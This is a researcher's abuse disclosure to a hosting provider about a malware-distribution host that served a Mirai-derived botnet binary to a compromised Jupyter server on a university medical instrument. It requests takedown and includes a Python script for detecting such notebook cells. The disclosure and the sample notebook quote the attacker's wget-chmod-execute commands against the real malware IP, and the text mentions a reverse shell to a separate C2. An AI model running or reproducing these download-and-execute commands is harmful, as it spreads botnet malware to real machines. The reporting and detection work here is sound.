

HIGH · Disclosure May 6, 2026

Cogent 38.87.117.84 Malware Host

To: abuse@cogentco.com
Cc: abuse@nuclide-research.com
Subject: Malware distribution host 38.87.117.84 (velonodes.in), served Hilix botnet binary used in medical research device compromise


Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com

2026-05-06

Re: Cogent customer host 38.87.117.84 served Hilix botnet malware
IP: 38.87.117.84 (rDNS velonodes.in, NetName DATALIX-CGNT-NET-2)
Severity: HIGH


I’m an independent security researcher conducting good-faith AI infrastructure research under the NuClide Research umbrella (CISA disclosures CVE-2025-4364, ICSA-25-140-11). This is a malware-host disclosure.

The host 38.87.117.84 (rDNS velonodes.in, hosted on Cogent’s DATALIX-CGNT-NET-2) was used as a malware-distribution server for a Hilix botnet (Mirai-derivative) operation on 2026-04-29. The malware payload Hilix.x86_64 was downloaded by a compromised host at Universität Ulm Medical Faculty via:

wget http://38.87.117.84/Hilix.x86_64 -O x86_64
chmod +x x86_64
./x86_64 jupiter

Forensic evidence preserved in the victim host’s Jupyter notebook (/home/labuser/Untitled.ipynb, cell #11, modified 2026-04-29 22:51:08 UTC):

Connecting to 38.87.117.84 (38.87.117.84:80)
saving to 'x86_64'
x86_64               100% |********************************|  109k  0:00:00 ETA
'x86_64' saved
sh: line 1: ./x86_64: cannot execute binary file: Exec format error

The execution failed because the victim is an ARM-based embedded medical instrument (Cocoa Labs CL1-2544-043 neural amplifier). The attacker returned 6 days later with a different payload (socat reverse shell to a separate C2 at 172.233.96.208, disclosed separately to Akamai/Linode abuse).
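The notebook-cell evidence above is the kind of artifact an incident responder has to find quickly across a lab's Jupyter hosts. The following triage script is an added example, not part of this disclosure or the linked case study: it parses .ipynb files, flags code cells that download from a raw-IP URL and then chmod/execute the result, and records whether the cell output shows the "Exec format error" loader refusal (the architecture-mismatch signal seen here). The embedded notebook is constructed for the example; the only value taken from the disclosure is the IP 38.87.117.84.

```python
"""Triage helper for Jupyter notebooks: find download-and-execute cells and the
shell output they produced. Added example; the sample notebook is constructed."""
import json
import re
from typing import Dict, List

# Code-cell patterns: wget/curl fetching from a raw IPv4 URL, chmod +x, run from cwd.
# The leading "!" Jupyter uses for shell lines is a non-word char, so \b still matches.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})")
CHMOD_RE = re.compile(r"\bchmod\s+\+x\b")
EXEC_RE = re.compile(r"(?:^|[\s;&|!])\./\S+", re.M)
# Output patterns: the busybox-style wget banner and the kernel's ELF loader refusal.
CONNECT_RE = re.compile(r"Connecting to (\d{1,3}(?:\.\d{1,3}){3})")
EXEC_FORMAT_RE = re.compile(r"cannot execute binary file: Exec format error")

# Known distribution host from the disclosure; extend from your own IoC list.
KNOWN_HOSTS = {"38.87.117.84"}


def cell_source(cell: dict) -> str:
    """Notebook sources are either a string or a list of line strings."""
    src = cell.get("source", "")
    return "".join(src) if isinstance(src, list) else src


def cell_output_text(cell: dict) -> str:
    """Collect stream text and text/plain results from all outputs of a cell."""
    parts = []
    for out in cell.get("outputs", []):
        text = out.get("text", "")
        parts.append("".join(text) if isinstance(text, list) else text)
        plain = out.get("data", {}).get("text/plain", "")
        parts.append("".join(plain) if isinstance(plain, list) else plain)
    return "\n".join(parts)


def scan_notebook(nb: dict) -> List[Dict]:
    """Return one finding per code cell that downloads from a raw-IP URL."""
    findings = []
    for idx, cell in enumerate(nb.get("cells", []), start=1):
        if cell.get("cell_type") != "code":
            continue
        src = cell_source(cell)
        out = cell_output_text(cell)
        dl = DOWNLOAD_RE.search(src)
        if not dl:
            continue
        ips = {dl.group(1)} | set(CONNECT_RE.findall(out))
        findings.append({
            "cell": idx,
            "ips": sorted(ips),
            "known_ioc": bool(ips & KNOWN_HOSTS),
            "chmod": bool(CHMOD_RE.search(src)),
            "executed": bool(EXEC_RE.search(src)),
            "exec_format_error": bool(EXEC_FORMAT_RE.search(out)),
        })
    return findings


def scan_notebook_file(path: str) -> List[Dict]:
    """Load an .ipynb from disk and scan it."""
    with open(path, "r", encoding="utf-8") as fh:
        return scan_notebook(json.load(fh))


# Constructed sample notebook: one markdown cell, one benign cell, one malicious cell.
SAMPLE_NOTEBOOK = {
    "cells": [
        {"cell_type": "markdown", "source": ["# recording session\n"]},
        {"cell_type": "code", "source": ["import numpy as np\n", "np.zeros(4)\n"],
         "outputs": [{"output_type": "execute_result",
                      "data": {"text/plain": ["array([0., 0., 0., 0.])"]}}]},
        {"cell_type": "code",
         "source": ["!wget http://38.87.117.84/Hilix.x86_64 -O x86_64; chmod +x x86_64; ./x86_64 jupiter\n"],
         "outputs": [{"output_type": "stream", "name": "stdout", "text": [
             "Connecting to 38.87.117.84 (38.87.117.84:80)\n",
             "saving to 'x86_64'\n",
             "'x86_64' saved\n",
             "sh: line 1: ./x86_64: cannot execute binary file: Exec format error\n"]}]},
    ]
}

if __name__ == "__main__":
    for finding in scan_notebook(SAMPLE_NOTEBOOK):
        print(json.dumps(finding))
```

Run it against real notebooks with `scan_notebook_file("/path/to/Untitled.ipynb")`; a hit with `executed` true but `exec_format_error` false is the case to escalate first, since the payload then ran on a matching architecture.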

Current status

External probes from NuClide’s research VPN (Mullvad EU exit) on 2026-05-07 02:00 UTC return HTTP 000 on ports 80, 443, 8080 and 22, so the host either:

  • Has been taken down (good)
  • Is filtering against scanner IPs
  • Has migrated the malware payload to a different URL

If the host is still operationally active, please confirm with the customer and request termination or null-route. If the host has already been remediated, this disclosure documents the historical use for your records.

The velonodes.in rDNS suggests this may be a compromised legitimate hosting customer (the name pattern fits residential / VPS hosting), not the botnet operator’s primary infrastructure. Customer-direct outreach (rather than termination) may be appropriate if they’re an unwitting victim.

Reference

Full case study with attack timeline + victim-host evidence: AI-LLM-Infrastructure-OSINT/blob/main/case-studies/commercial/multi-uni-ulm-jupyter-compromise-2026-05-06.md

Parallel disclosures sent:

  • it-sicherheit@uni-ulm.de + dfn-cert@dfn-cert.de for the victim’s incident response
  • abuse@akamai.com + abuse@linode.com for the active C2 (172.233.96.208) takedown

Happy to provide additional context if useful for your customer investigation.

Regards,
Nicholas Michael Kloster / NuClide Research
nicholas@nuclide-research.com
AI-LLM-Infrastructure-OSINT